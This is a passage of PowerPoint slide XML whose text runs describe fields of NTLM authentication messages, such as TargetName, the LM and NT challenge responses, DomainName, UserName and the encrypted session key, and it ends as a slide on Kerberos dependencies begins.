              <a:t>TargetNameBufferOffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> field SHOULD be set to the offset from the beginning of the CHALLENGE_MESSAGE to where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> would be in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> if it were present.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetNameLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetNameMaxLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TargetNameBufferOffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MUST be ignored on receipt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Otherwise, these fields are defined as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="he-IL"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147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246907669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148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6300069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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LmChallengeResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (variable): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>LM_RESPONSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>LMv2_RESPONSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> structure that contains the computed LM response to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>challenge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. If NTLM v2 authentication is configured, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LmChallengeResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MUST be an LMv2_RESPONSE structure (section </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>2.2.2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>). Otherwise, it MUST be an LM_RESPONSE structure (section </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>2.2.2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NtChallengeResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (variable): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>NTLM_RESPONSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>NTLMv2_RESPONSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> structure that contains the computed NT response to the challenge. If NTLM v2 authentication is configured, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NtChallengeResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MUST be an NTLMv2_RESPONSE (section </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>2.2.2.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>). Otherwise, it MUST be an NTLM_RESPONSE structure (section </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>2.2.2.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DomainName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (variable): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> or computer name hosting the user account. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DomainName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MUST be encoded in the negotiated character set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (variable): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The name of the user to be authenticated. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MUST be encoded in the negotiated character set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Workstation (variable): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The name of the computer to which the user is logged on. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Workstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MUST be encoded in the negotiated character set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>EncryptedRandomSessionKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (variable): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client's encrypted random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>session key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>EncryptedRandomSessionKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and its usage are defined in sections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>3.1.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>3.2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL"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149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2774422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effectLst/>
              </a:rPr>
              <a:t>This section reviews dependencies and summarizes how each dependency relates to Kerberos authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Operating System</a:t>
